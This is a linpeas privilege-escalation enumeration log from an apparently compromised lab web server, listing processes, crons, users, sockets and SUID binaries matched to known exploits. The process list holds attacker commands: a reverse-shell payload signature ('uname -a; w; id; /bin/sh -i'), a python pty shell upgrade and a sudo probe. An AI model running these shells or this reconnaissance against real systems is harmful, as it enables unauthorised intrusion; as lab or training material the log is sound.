═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 1.5 169036 11284 ? Ss Nov16 0:08 /sbin/init
root 334 0.0 1.8 35020 13784 ? S<s Nov16 0:02 /lib/systemd/systemd-journald
root 362 0.0 0.6 20984 5112 ? Ss Nov16 0:04 /lib/systemd/systemd-udevd
systemd+ 373 0.0 1.0 18408 7528 ? Ss Nov16 0:01 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 409 0.0 1.5 23896 11944 ? Ss Nov16 0:01 /lib/systemd/systemd-resolved
systemd+ 410 0.0 0.8 90228 6008 ? Ssl Nov16 0:01 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 419 0.0 1.3 50136 10436 ? Ss Nov16 0:00 /usr/bin/VGAuthService
root 420 0.1 0.9 238912 7244 ? Ssl Nov16 7:41 /usr/bin/vmtoolsd
root 457 0.0 0.9 238180 7296 ? Ssl Nov16 0:09 /usr/lib/accountsservice/accounts-daemon
root 458 0.0 0.3 9412 2860 ? Ss Nov16 0:01 /usr/sbin/cron -f
message+ 462 0.0 0.6 7452 4548 ? Ss Nov16 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 472 0.0 2.4 31620 18156 ? Ss Nov16 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog 473 0.0 0.6 224320 4940 ? Ssl Nov16 0:00 /usr/sbin/rsyslogd -n -iNONE
root 475 0.0 0.7 16476 5788 ? Ss Nov16 0:01 /lib/systemd/systemd-logind
root 512 0.0 0.4 6808 3016 ? Ss Nov16 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 515 0.0 0.9 232712 6880 ? Ssl Nov16 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 521 0.0 0.2 8428 1908 tty1 Ss+ Nov16 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 536 0.0 2.4 193604 18404 ? Ss Nov16 0:22 /usr/sbin/apache2 -k start
www-data 12739 0.0 1.6 194060 12552 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15973 0.0 0.0 2608 540 ? S 22:03 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15977 0.0 0.0 2608 604 ? S 22:03 0:00 | _ /bin/sh -i
www-data 15979 0.0 1.1 17820 8700 ? S 22:03 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15980 0.0 0.4 9904 3388 pts/2 Ss+ 22:03 0:00 | _ /bin/bash
www-data 12740 0.0 1.6 194060 12552 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15963 0.0 0.0 2608 604 ? S 22:01 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15967 0.0 0.0 2608 532 ? S 22:01 0:00 | _ /bin/sh -i
www-data 15968 0.0 1.1 17820 8684 ? S 22:01 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15969 0.0 0.4 9904 3728 pts/1 Ss+ 22:01 0:00 | _ /bin/bash
www-data 12741 0.0 1.2 194084 9564 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 12742 0.0 1.6 194084 12616 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15984 0.0 0.0 2608 540 ? S 22:08 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15988 0.0 0.0 2608 600 ? S 22:08 0:00 | _ /bin/sh -i
www-data 15989 0.0 1.1 18076 8800 ? S 22:08 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15990 0.0 0.4 10036 3692 pts/3 Ss 22:08 0:00 | _ /bin/bash
www-data 29884 0.4 0.3 3588 2612 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 32818 0.0 0.1 3588 1072 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 32822 0.0 0.4 12020 3376 pts/3 R+ 22:20 0:00 | | _ ps fauxwww
www-data 32821 0.0 0.1 3588 1072 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 12743 0.0 1.9 194060 14348 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15946 0.0 0.0 2608 604 ? S 21:57 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15950 0.0 0.0 2608 604 ? S 21:57 0:00 | _ /bin/sh -i
www-data 15952 0.0 1.1 17952 8608 ? S 21:59 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15954 0.0 0.5 9904 3736 pts/0 Ss 21:59 0:00 | _ /bin/bash
root 15961 0.0 0.5 11348 3920 pts/0 S+ 22:00 0:00 | _ sudo -l
www-data 15936 0.0 1.7 194216 12796 ? S 21:51 0:00 _ /usr/sbin/apache2 -k start
www-data 15962 0.0 1.1 194036 8280 ? S 22:01 0:00 _ /usr/sbin/apache2 -k start
www-data 15978 0.0 1.1 194036 8280 ? S 22:03 0:00 _ /usr/sbin/apache2 -k start
www-data 15983 0.0 1.1 194036 8280 ? S 22:07 0:00 _ /usr/sbin/apache2 -k start
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Sep 13 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 712 Mar 27 2020 php
-rw-r--r-- 1 root root 190 Jun 27 2020 popularity-contest
/etc/cron.daily:
total 44
drwxr-xr-x 2 root root 4096 Sep 13 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 539 Jul 5 2021 apache2
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2022-11-20 22:39:00 CET 18min left Sun 2022-11-20 22:09:08 CET 11min ago phpsessionclean.timer phpsessionclean.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Fri 2022-11-18 15:18:12 CET 2 days ago fstrim.timer fstrim.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Sun 2022-11-20 00:00:22 CET 22h ago logrotate.timer logrotate.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Sun 2022-11-20 00:00:22 CET 22h ago man-db.timer man-db.service
Mon 2022-11-21 01:26:24 CET 3h 5min left Sun 2022-11-20 13:28:08 CET 8h ago apt-daily.timer apt-daily.service
Mon 2022-11-21 03:29:07 CET 5h 8min left Sun 2022-11-20 15:28:08 CET 6h ago ua-messaging.timer ua-messaging.service
Mon 2022-11-21 05:29:55 CET 7h left Sun 2022-11-20 18:10:08 CET 4h 10min ago motd-news.timer motd-news.service
Mon 2022-11-21 06:45:04 CET 8h left Sun 2022-11-20 06:26:08 CET 15h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2022-11-21 20:12:22 CET 21h left Sun 2022-11-20 20:12:22 CET 2h 8min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2022-11-27 03:10:38 CET 6 days left Sun 2022-11-20 03:11:08 CET 19h ago e2scrub_all.timer e2scrub_all.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/dbus/system_bus_socket
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 373 systemd-network systemd-network :1.0 systemd-networkd.service - -
:1.1 410 systemd-timesyn systemd-timesync :1.1 systemd-timesyncd.service - -
:1.2 409 systemd-resolve systemd-resolve :1.2 systemd-resolved.service - -
:1.3 457 accounts-daemon root :1.3 accounts-daemon.service - -
:1.33 35650 busctl www-data :1.33 apache2.service - -
:1.4 1 systemd root :1.4 init.scope - -
:1.5 475 systemd-logind root :1.5 systemd-logind.service - -
:1.6 515 polkitd root :1.6 polkit.service - -
:1.7 472 networkd-dispat root :1.7 networkd-dispatcher.service - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
io.netplan.Netplan - - - (activatable) - - -
org.freedesktop.Accounts 457 accounts-daemon root :1.3 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 515 polkitd root :1.6 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 475 systemd-logind root :1.5 systemd-logind.service - -
org.freedesktop.network1 373 systemd-network systemd-network :1.0 systemd-networkd.service - -
org.freedesktop.resolve1 409 systemd-resolve systemd-resolve :1.2 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.4 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 410 systemd-timesyn systemd-timesync :1.1 systemd-timesyncd.service - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
li204-vmLS5.smartlearn.lan
127.0.0.1 localhost.localdomain localhost
127.0.1.1 li204-vmLS5.smartlearn.lan li204-vmLS5
192.168.110.120 li204-vmLS5.smartlearn.lan li204-vmLS5
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0 trust-ad
search smartlearn.lan
smartlearn.lan
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.110.120 netmask 255.255.255.0 broadcast 192.168.110.255
inet6 fe80::250:56ff:fe01:2001 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:01:20:01 txqueuelen 1000 (Ethernet)
RX packets 935078 bytes 57088719 (57.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 145840 bytes 8357060 (8.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 184 bytes 15240 (15.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 184 bytes 15240 (15.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::20021 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
vmadmin:x:1000:1000:vmadmin,,,:/home/vmadmin:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(vmadmin) gid=1000(vmadmin) groups=1000(vmadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1001(sudo-nopasswd)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=107(tcpdump) gid=112(tcpdump) groups=112(tcpdump)
uid=108(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=109(ftp) gid=117(ftp) groups=117(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
22:20:47 up 4 days, 2:27, 0 users, load average: 0.43, 0.16, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Fri Nov 4 21:04:00 2022 still running 0.0.0.0
vmadmin pts/0 Mon Sep 13 10:40:20 2021 - Tue Sep 14 06:39:07 2021 (19:58) 192.168.120.50
reboot system boot Mon Sep 13 10:39:36 2021 still running 0.0.0.0
vmadmin pts/1 Mon Sep 13 10:35:34 2021 - Mon Sep 13 10:37:53 2021 (00:02) 192.168.120.50
vmadmin pts/0 Mon Sep 13 10:06:51 2021 - Mon Sep 13 10:38:02 2021 (00:31) 192.168.120.50
reboot system boot Mon Sep 13 10:02:13 2021 - Mon Sep 13 10:38:02 2021 (00:35) 0.0.0.0
reboot system boot Mon Sep 13 10:01:57 2021 - Mon Sep 13 10:02:02 2021 (00:00) 0.0.0.0
wtmp begins Wed Jul 28 21:36:34 2021
╔══════════╣ Last time logon each user
Username Port From Latest
vmadmin pts/0 192.168.120.50 Mon Sep 13 10:40:20 +0200 2021
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)
Server built: 2021-07-05T07:16:56
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep 13 2021 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Sep 13 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Jul 5 2021 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 72941 Aug 13 2021 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Aug 13 2021 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 3 2021 /etc/ldap
╔══════════╣ Searching ssl/ssh files
ChallengeResponseAuthentication no
UsePAM yes
══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Sep 13 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 May 29 2020 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul 28 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 18 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 14 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Aug 13 2021 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Aug 13 2021 /usr/share/php7.4-common/common/ftp.ini
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 vmadmin vmadmin 3818 Sep 13 2021 /home/vmadmin/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 vmadmin vmadmin 807 Jun 27 2020 /home/vmadmin/.profile
-rw-r--r-- 1 vmadmin vmadmin 0 Jun 27 2020 /home/vmadmin/.sudo_as_admin_successful
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K May 26 2021 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 9 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Jul 21 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 55K Jul 21 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
